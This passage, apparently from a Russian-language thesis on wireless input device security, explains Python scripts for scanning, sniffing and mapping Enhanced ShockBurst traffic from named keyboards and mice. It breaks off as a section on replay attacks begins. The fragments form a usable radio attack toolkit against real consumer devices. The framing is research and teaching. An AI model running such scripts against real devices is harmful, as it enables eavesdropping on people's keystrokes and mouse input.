common.radio.set_channel(common.channels[channel_index])

last_tune = time.time()

# Получение полезной нагрузки

value = common.radio.receive_payload()

if len(value) >= 5:

Данное действие предполагает сканирование каналов, поиск и распознавание ESB-пакетов для определения MAC-адресов беспроводных устройств в зоне действия комплекса



# Вывод адреса и полезной нагрузки в заданном формате

address, payload = value[0:5], value[5:]

# Содержимое пакета в заданном формате

logging.info('{0: >2} {1: >2} {2} {3}'.format(

common.channels[channel_index],

len(payload),

':'.join('{:02X}'.format(b) for b in address),

':'.join('{:02X}'.format(b) for b in payload)))

Данное действие выводит MAC-адреса обнаруженных устройств, номер канала, на котором устройство осуществляет передачу, размер пакета, а также другую информацию об устройстве передаваемую в ESB-пакете.

Результат работы программы сканирования при работе двух беспроводных устройств представлен на рис. 5.2.

Рис. 5.2 - Результат выполнения сканирующего скрипта на атакующем компьютере

Данная атака не является основной и обычно используется злоумышленниками на подготовительном этапе. Она позволяет определить перечень работающих устройств и их производителей, выяснить на каких каналах ведется передача, определить тип устройства (а в некоторых случаях и его модель). На основании этой информации злоумышленник прорабатывает план будущих атак, на основе конкретных уязвимостей атакуемого устройства.

5.2 Атака - перехват пакетов

Следующим видом атаки является перехват пакетов или Sniffering. При осуществлении данной атаки злоумышленник перехватывает пакеты, передаваемые по радиоканалу, и получает возможность их дальнейшего анализа.

Для осуществления данной атаки был написан скрипт на языке «Python», фрагмент листинга приведен далее:

# Анализ адреса

address = common.args.address.replace(':', '').decode('hex')[::-1][:5]

address_string = ':'.join('{:02X}'.format(ord(b)) for b in address[::-1])

if len(address) < 2:

raise Exception('Invalid address: {0}'.format(common.args.address))

Данное действие необходимо для загрузки MAC-адреса атакуемого устройства в исполняемую программу. В дальнейшем перехватываться будут только пакеты пришедшие с этого адреса.

# Переключение устройства в режим сниффера

common.radio.enter_sniffer_mode(address)

Данное действие необходимо для перевода устройства в режим работы пригодный для перехвата пакетов.

# Анализ служебной полезной нагрузки

ping_payload = common.args.ping_payload.replace(':', '').decode('hex')

Данное действие необходимо для выделения служебной информации из пакета

# Задание временных интервалов номера подтверждения и повторной

попытки

ack_timeout = int(common.args.ack_timeout / 250) - 1

ack_timeout = max(0, min(ack_timeout, 15))

retries = max(0, min(common.args.retries, 15))

Данное действие необходимо для обеспечения функции повторной отправки при неудачной попытке

# Переключение между каналами и декодирование пакетов ESB (шина

унифицированного, событийного обмена) в псевдо-случайном режиме

last_ping = time.time()

channel_index = 0

while True:

# Следование за атакуемым устройством при изменении им каналов

передачи

if time.time() - last_ping > timeout:

# Первая попытка пингования на атакуемом канале

if not common.radio.transmit_payload(ping_payload, ack_timeout, retries):

# Переключение по доступным каналам при не удачном пинге

атакуемого канала

success = False

for channel_index in range(len(common.channels)):

common.radio.set_channel(common.channels[channel_index])

if common.radio.transmit_payload(ping_payload, ack_timeout, retries):

# Выход из подпрограммы при успешном пинге на атакуемом канале

last_ping = time.time()

logging.debug('Ping success on channel

{0}'.format(common.channels[channel_index]))

success = True

break

# Неудачный пинг

if not success: logging.debug('Unable to ping {0}'.format(address_string))

# Успешный пинг на атакуемом канале

else:

logging.debug('Ping success on channel

{0}'.format(common.channels[channel_index]))

last_ping = time.time()

Данные действия необходимы для анализа активности в атакуемом канале и своевременного изменения настроек для успешного перехвата пакетов

# Получение полезной нагрузки

value = common.radio.receive_payload()

if value[0] == 0:

Данное действие необходимо для выделения предаваемой полезной информации из перехваченного пакета

# Отделение полезной нагрузки от служебной информации

payload = value[1:]

Данное действие необходимо для отделения полезной информации от данных синхронизации и другой служебной информации.

# Вывод информации о пакете

logging.info('{0: >2} {1: >2} {2} {3}'.format(

common.channels[channel_index],

len(payload),

address_string,

':'.join('{:02X}'.format(b) for b in payload)))

Данное действие необходимо для форматированного вывода перехваченной информации.

Результат работы программы для беспроводной клавиатуры Microsoft Wireless Desktop 2000 представлен на рисунке рис. 5.3.

Рис. 5.3 - Результат работы программы для беспроводной клавиатуры Microsoft Wireless Desktop 2000

Перехваченная информация закодирована в кодах клавиатуры и зашифрована с помощью алгоритма AES-128, поэтому её расшифровка является затруднительной. Однако при наличии большого количества перехваченных кодов можно применить частотный криптоанализ и определить ключ шифрования, после этого все нажатия клавиш можно будет однозначно распознать. Результат работы программы для беспроводной мыши Lenovo K500 представлен на рисунке рис. 5.4.

Рис. 5.4 - Результат выполнения работы программы для беспроводной мыши Lenovo K500

Перехваченная информация закодирована в кодах мыши, но не зашифрована, а, значит, злоумышленник может разобраться в командах мыши и принципах их формирования, что грозит серьезными последствиями. Основной опасностью данной уязвимости является компрометация защищенных экранных клавиатур, предоставляемых различными решениями в области информационной безопасности. И, хотя процесс осуществления подобных атак на защищенные экранные клавиатуры является довольно трудоемким, говорить о его невозможности нельзя.

Данная атака угрожает одному из основных критериев защищенности информации - конфиденциальности, поскольку перехват данных устройство ввода раскрывает содержание вводимой информации, которая, часто, является критичной.

5.3 Атака - построение топологии беспроводной сети

Следующий вид атаки построение топологии беспроводной сети или Mapping. При осуществлении данной атаки злоумышленник, зная MAC-адрес устройства жертвы, отправляет эхо-запросы на другие адреса в поле перебора существующего MAC-адреса. Если запрос злоумышленника получает ответ, значит устройство с данным MAC-адресом может быть использовано в сети. Атака направлена на установление MAC-адресов разрешенных в системе, для последующей атаки на них. Для осуществления данной атаки был написан скрипт на языке «Python», фрагмент листинга приведен далее:

# Анализ адреса

address = common.args.address.replace(':', '').decode('hex')[::-1][:5]

address_string = ':'.join('{:02X}'.format(ord(b)) for b in address[::-1])

if len(address) < 2:

raise Exception('Invalid address: {0}'.format(common.args.address))

Данное действие необходимо для загрузки MAC-адреса атакуемого устройства в исполняемую программу. В дальнейшем перехватываться будут только пакеты пришедшие с этого адреса.

# Переключение устройства в режим сниффера

common.radio.enter_sniffer_mode(address)

Данное действие необходимо для перевода устройства в режим работы пригодный для перехвата пакетов.

# Анализ служебной полезной нагрузки

ping_payload = common.args.ping_payload.replace(':', '').decode('hex')

Данное действие необходимо для выделения служебной информации из пакета

# Задание временных интервалов номера подтверждения и повторной

попытки

ack_timeout = int(common.args.ack_timeout / 250) - 1

ack_timeout = max(0, min(ack_timeout, 15))

retries = max(0, min(common.args.retries, 15))

Данное действие необходимо для обеспечения функции повторной отправки при неудачной попытке

# Эхо-запрос на каждый адрес на каждом канале определенное число

раз

valid_addresses = []

for p in range(2):

# Шаг через каждый потенциальный адрес

for b in range(256):

try_address = chr(b) + address[1:]

logging.info('Trying address {0}'.format(':'.join('{:02X}'.format(ord(b)) for

b in try_address[::-1])))

common.radio.enter_sniffer_mode(try_address)

# Шаг через каждый канал

for c in range(len(common.args.channels)):

common.radio.set_channel(common.channels[c])

# Попытка эхо-запроса на адрес

if common.radio.transmit_payload(ping_payload, ack_timeout, retries):

valid_addresses.append(try_address)

logging.info('Successful ping of {0} on channel {1}'.format(

':'.join('{:02X}'.format(ord(b)) for b in try_address[::-1]),

common.channels[c]))

Данное действие передает эхо-запросы на MAC-адреса в поле перебора адреса известного устройства на разных каналах. И фиксирует полученные ответы

# Вывод результатов

valid_addresses = list(set(valid_addresses))

for addr in valid_addresses:

logging.info('Found address {0}'.format(':'.join('{:02X}'.format(ord(b)) for b

in addr[::-1])))

Данное действие выводит результаты сканирования в заданном формате. Результат работы программы для беспроводной клавиатуры Microsoft Wireless Desktop 2000 представлен на рисунке рис. 5.5, для беспроводной мыши Lenovo K500 - на рис. 5.6.

Рис. 5.5 - Результат работы программы для беспроводной клавиатуры Microsoft Wireless Desktop 2000

Рис. 5.6 - Результат работы программы для беспроводной мыши Lenovo K500

Как видно из рис. 5.5 для беспроводной клавиатуры Microsoft Wireless Desktop 2000 существуют несколько активных MAC-адресов:

для беспроводной мыши Lenovo K500 также существуют несколько активных адресов (рис.5.6).

Впоследствии злоумышленник может эмулировать беспроводное устройство и с его помощью атаковать компьютер жертвы.

5.4 Атака повторного воспроизведения

Следующая рассмотренная атака - атака повторного воспроизведения, также известная как Replay-атака.

...